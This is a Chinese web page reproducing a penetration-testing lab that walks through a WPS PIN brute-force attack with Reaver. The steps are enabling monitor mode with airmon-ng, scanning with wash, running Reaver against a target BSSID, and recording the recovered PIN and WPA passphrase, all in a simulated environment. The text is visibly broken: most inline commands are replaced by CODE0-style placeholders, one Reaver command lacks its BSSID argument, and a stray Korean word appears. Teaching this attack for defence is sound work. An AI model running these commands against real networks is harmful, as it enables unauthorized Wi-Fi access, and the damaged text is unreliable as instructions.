当前位置:

首页 > 系统应用 > 使用 Reaver 执行 WPS 暴力破解攻击

使用 Reaver 执行 WPS 暴力破解攻击

引言 Wi-Fi Protected Setup (WPS) 是一种网络安全标准,旨在使路由器与无线设备之间的连接更快速、更简便。然而,其 PIN 功能存在一个重大的设计缺陷,使其容易受到暴力破解攻击。 本实验中,你将化身渗透测试人员,学习利用Rea ver(一款专为该目的设计的工具)来利用这一漏洞

引言

Wi-Fi Protected Setup (WPS) 是一种网络安全标准,旨在使路由器与无线设备之间的连接更快速、更简便。然而,其 PIN 功能存在一个重大的设计缺陷,使其容易受到暴力破解攻击。

本实验中,你将化身渗透测试人员,学习利用Rea ver(一款专为该目的设计的工具)来利用这一漏洞。从设置无线接口、扫描目标,到发起攻击并成功恢复WPA/WPA2密码短语,你将全程参与。通过这种实践,你将切实理解一种常见的Wi-Fi攻击向量,以及网络安全卫生的重要性。

在本实验中,我们将使用模拟的 Wi-Fi 环境,以便你可以安全合法地执行这些操作。

从 wash 扫描中选择一个目标 BSSID

在这个环节,你要准备好无线接口用于监控,并扫描存在WPS漏洞的网络。首先要做的是将你的无线网卡设置为“监控模式”(monitor mode),这样它就能捕获空中所有的Wi-Fi流量,而不仅仅是发送到你设备的流量。我们会使用CODE0来实现这一点。然后,再用CODE1来确定我们的目标。

首先,让我们在监控模式下启动虚拟无线接口 CODE0。这将创建一个新的接口,通常命名为 CODE1

sudo airmon-ng start wlan0

你应该会看到输出确认监控模式已启用。现在,在接口处于监控模式下,你可以使用 CODE_0 来扫描附近的启用了 WPS 的接入点。

sudo wash -i wlan0mon

片刻之后,CODE0 将显示一个网络列表。我们的模拟网络名为 CODE1

BSSID               Ch  WPS Version  WPS Locked  ESSID
--------------------------------------------------------------------------------
XX:XX:XX:XX:XX:XX   6   1.0          No          TestAP

从此输出中,识别并复制 CODE0 网络的 CODE1。BSSID 是接入点的唯一硬件地址,在下一步发起攻击时你需要用到它。

使用 -i 和 -b 标志启动 Rea ver 攻击

在此步骤中,你将针对你已识别的目标接入点发起 Rea ver 攻击。Rea ver 会自动化尝试所有可能的 WPS PIN 组合以找到正确 PIN 的过程。

要启动攻击,你需要向 Rea ver 提供两个关键信息:监控模式接口和目标的 BSSID。

  • CODE0:指定监控模式接口(例如 CODE1)。
  • CODE_0:指定目标接入点的 BSSID。

现在,运行 CODE0 命令。将 CODE1 替换为你在上一步复制的实际 BSSID。

sudo rea ver -i wlan0mon -b 

执行命令后,Rea ver 将开始运行。当你与目标接入点关联时,你将看到初始状态消息。

```plaintext
[+] Rea ver v1.6.5 WiFi Protected Setup Attack Tool
[+] Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

[+] Waiting for beacon from XX:XX:XX:XX:XX:XX
[+] Associated with TestAP (ESSID: TestAP)
```

这表明攻击已经开始。在下一步中,我们将添加一个参数来查看更详细的进度。目前,你可以通过按 CODE_0 来停止当前命令。

添加 -vv 参数以获取详细输出以监控进度

在此步骤中,你将使用详细标志重新启动 Rea ver 攻击,以获得关于其进度的更详细反馈。默认情况下,Rea ver 的输出非常少。为了学习和故障排除,了解该工具的确切操作非常有帮助。

Rea ver 有一个详细标志 CODE0,以及一个双详细标志 CODE1,用于提供更多细节。我们将使用 CODE_2 来查看 PIN 尝试和其他事务信息。

如果之前的 Rea ver 命令仍在运行,请按 CODE0 停止它。现在,重新运行该命令,并在末尾添加 CODE1 标志。请记住使用与之前相同的 BSSID。

sudo rea ver -i wlan0mon -b < BSSID_FROM_WASH > -vv

启用详细输出后,你现在将看到攻击的更详细日志。这包括 M1-M7 消息,它们是 WPS 身份验证交换的一部分,以及正在测试的具体 PIN。

[+] Associated with TestAP (ESSID: TestAP)
[+] Trying pin "12345670"
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
...

此详细视图确认 Rea ver 正在积极地针对目标测试 PIN。

观察 PIN 破解尝试和进度百分比

在此步骤中,你将观察 Rea ver 攻击的运行情况。启用详细输出后,你可以实时监控进度。

随着 Rea ver 的运行,请注意终端输出中的两个关键信息:

  1. PIN 尝试:你将看到类似 CODE_0 的行。这显示了 Rea ver 当前正在测试的确切 PIN。
  2. 进度百分比:Rea ver 会定期更新其进度,显示类似 CODE_0 的行。

WPS PIN 是一个 8 位数字,但 Rea ver 会将其分成两部分进行破解。它首先暴力破解前四位数字,然后是接下来的三位数字,最后一位数字是一个校验和,可以计算得出。这种设计将可能性从 100,000,000 大幅减少到仅 11,000,使得攻击非常实用。

在我们模拟的环境中,由于我们将接入点配置为 Rea ver 早期尝试的已知 PIN,因此攻击将非常快速地完成。在实际场景中,这个过程可能需要几个小时。

让命令运行直到完成。在此步骤中,你无需输入任何新命令;只需观察输出即可。

记录成功后找到的 WPS PIN 和 WPA 密码短语

在此步骤中,你将看到 Rea ver 攻击成功的 결과,并记录恢复的凭据。

一旦 Rea ver 找到正确的 WPS PIN,它将使用该 PIN 从接入点检索 WPA/WPA2 密码短语。然后攻击将停止,Rea ver 会将恢复的凭据打印到屏幕上。

成功的输出将如下所示:

[+] WPS PIN: '12345670'
[+] WPA PSK: 'labex_password'
[+] AP SSID: 'TestAP'

恭喜!你已成功执行了 WPS 暴力破解攻击并恢复了网络的凭据。

为了方便记录,让我们将此信息保存到项目目录中一个名为 CODE_0 的文件中。执行以下命令来创建文件并存储凭据:

echo -e "WPS PIN: 12345670nWPA Passphrase: labex_password" > ~/project/result.txt

你可以使用 CODE_0 命令验证文件内容:

cat ~/project/result.txt

总结

在本实验中,你获得了对一种常见 Wi-Fi 攻击的实践经验。你了解了 WPS 协议中的漏洞以及如何在安全的模拟环境中利用 Rea ver 工具进行攻击。

你成功完成了以下关键任务:

  • 使用 CODE_0 将无线接口置于监听模式。
  • 使用 CODE_0 扫描并识别出易受攻击的启用了 WPS 的网络。
  • 使用 CODE_0 发起暴力破解攻击,指定目标和接口。
  • 使用详细标志(verbose flags)详细监控攻击进度。
  • 成功恢复了 WPS PIN 和 WPA 密码短语。

本次练习突显了加强网络安全实践的重要性。为了防范此类攻击,强烈建议禁用无线路由器上的 WPS 功能。

本文内容来源于互联网,如有侵权请联系删除。
作者最新文章
系统应用
相关文章 更多
Windows安装Docker教程:启用WSL2并运行第一个容器验证
Windows安装Docker教程:启用WSL2并运行第一个容器验证

本文提供Windows环境下安装Docker Desktop的完整步骤,重点在于启用WSL2后端及验证容器运行。通过PowerShell执行docker version确认客户端与服务端连通,并运行hello-world测试镜像完成基础环境搭建。

CentOS 7在VMware中的完整安装与验证指南
CentOS 7在VMware中的完整安装与验证指南

本文详细讲解如何在VMware Workstation中从零开始安装CentOS 7虚拟机。内容涵盖ISO镜像准备、典型配置创建、硬件参数分配(磁盘与内存)、安装器操作及首次启动后的版本与网络验证。通过规范化的步骤指引,帮助读者快速搭建稳定可用的Linux学习环境,并解决常见的启动与网络故障。

习惯Office转WPS要多久?双生态兼容与无缝切换指南
习惯Office转WPS要多久?双生态兼容与无缝切换指南

从Office转向WPS的核心操作肌肉记忆切换通常需3至7天,不影响正常办公。适应期长短取决于界面视觉差异与专属格式配置。通过切换“经典界面”、嵌入字体及开启云同步,可实现平滑过渡。本文详解格式兼容、数据迁移及AI功能适用场景,适用于需多端协同、成本控制及国产化兼容的办公人群。

Kubernetes入门:用kubectl创建并查看第一个Deployment
Kubernetes入门:用kubectl创建并查看第一个Deployment

本文指导使用 kubectl 创建最小 nginx Deployment,并通过 READY、UP-TO-DATE、AVAILABLE 与 Pod Running 状态进行验收。重点区分“命令已接收”和“工作负载已可用”,并在状态异常时利用 Pod 详情与事件输出定位镜像、调度或启动问题。

Mac外接鼠标滚动方向设置:关闭自然滚动与触控板分离方案
Mac外接鼠标滚动方向设置:关闭自然滚动与触控板分离方案

Mac外接鼠标滚动方向与触控板不一致时,可通过系统设置中的“自然滚动”开关调整。本文详解如何进入鼠标设置页面、切换滚动逻辑,并提供鼠标与触控板方向分离的第三方工具方案,解决滚轮手感不适及多设备冲突问题。

Ubuntu命令行入门:打开终端并验证文件目录操作
Ubuntu命令行入门:打开终端并验证文件目录操作

本教程指导Ubuntu新手打开终端,通过pwd、ls、cd、mkdir和touch命令完成基础文件目录操作。适用于桌面版、虚拟机及WSL环境,提供从查看路径到创建测试文件的完整验证步骤,帮助读者建立命令行操作的安全意识与正确习惯。

Nginx Windows版安装、启动与验证完整指南
Nginx Windows版安装、启动与验证完整指南

本教程针对Windows环境,详解Nginx稳定版(如1.24.0)的下载、解压、启动及验证流程。核心步骤包括:下载官方压缩包至英文目录,使用start nginx启动,通过localhost访问默认页面,并利用tasklist和nginx -t命令确认进程状态及配置语法。涵盖端口冲突排查、配置重载及停止服务的标准操作,适用于本地开发环境搭建与基础运维验证。

VMware虚拟机共享文件夹配置与读写验证教程
VMware虚拟机共享文件夹配置与读写验证教程

本文提供VMware虚拟机共享文件夹的配置与验证方法。核心步骤包括:确保VMware Tools已安装,在虚拟机设置中启用共享文件夹并添加主机目录,最后通过读写测试文件确认传输正常。适用于Windows及Linux虚拟机,旨在解决主机与虚拟机间文件交换问题。

大数据分析师Linux环境教程:安装Hadoop并验证版本与进程状态
大数据分析师Linux环境教程:安装Hadoop并验证版本与进程状态

本教程指导大数据分析师在Linux环境中安装Hadoop,通过配置环境变量、验证版本及启动服务,确保Java和Hadoop命令可用。最终利用jps命令检查NameNode等核心进程状态,为后续学习HDFS和Spark打下基础。

在VMware中安装Ubuntu并验证启动的完整步骤
在VMware中安装Ubuntu并验证启动的完整步骤

本文提供在VMware中安装Ubuntu并验证启动的完整流程。适用于首次练习Linux或搭建开发环境的用户。按步骤完成虚拟机创建、ISO挂载、硬件分配与安装后,可通过终端命令确认版本、内核与网络状态,确保系统可正常使用。

查看更多
精品专题 更多
装机必备
装机必备

正软商城装机必备专区,精选办公、浏览器、安全防护、影音播放、压缩解压、设计创作和系统工具等电脑常用正版软件,帮助用户快速完成新电脑软件配置。

Windows
Windows

正软商城Windows软件专区,汇集适用于Windows电脑的办公、设计、安全防护、影音播放、开发工具和系统优化软件,提供软件介绍、系统要求、正版授权及购买下载服务。

macOS软件
macOS软件

正软商城macOS软件专区,精选适用于Mac电脑的办公、设计、影音、效率、开发和系统工具,提供软件功能介绍、macOS兼容版本、正版授权及购买下载服务。

Mac软件 更多
灵活计算器
灵活计算器
macOS/iOS/Android

灵活计算器是一款笔记式算数应用,支持实时计算、动态关联和云端同步功能。记录、整理和输出之间的过渡会更自然,适合长期写作、做笔记或持续沉淀个人内容。

赤友清理大师
赤友清理大师
macOS

赤友清理大师是一款为 Mac 设计的智能清理优化工具,可精准扫描垃圾、大文件、重复文件等,释放磁盘空间。做扫描整理、文字提取和表格转换时,它能把识别后的处理步骤接得更顺,资料录入这类场景会省下不少时间。

极度公式
极度公式
Windows/macOS/Linux

极度公式是一款跨平台专业LaTeX公式识别编辑软件,支持OCR公式识别和多平台编辑。和使用说明,避免使用,享受完整功能与稳定支持。做扫描整理、文字提取和表格转换时,它能把识别后的处理步骤接得更顺,资料录入这类场景会省下不少时间。

WINDOWS 更多
Windows 10
Windows 10
Windows

Windows 10 是一款微软推出的经典操作系统,拥有硬件兼容性与多任务处理能力。它更偏向把系统状态查看和常用调节动作放在一起,适合需要持续观察和微调设备状态的场景。

极度公式
极度公式
Windows/macOS/Linux

极度公式是一款跨平台专业LaTeX公式识别编辑软件,支持OCR公式识别和多平台编辑。和使用说明,避免使用,享受完整功能与稳定支持。做扫描整理、文字提取和表格转换时,它能把识别后的处理步骤接得更顺,资料录入这类场景会省下不少时间。

密码键盘
密码键盘
Windows/macOS/iOS/Android

密码键盘是一款兼具安全性与便捷性的高效密码管理器。日常使用里的持续防护和信息管理会更突出,适合把安全控制放进长期使用流程中的场景。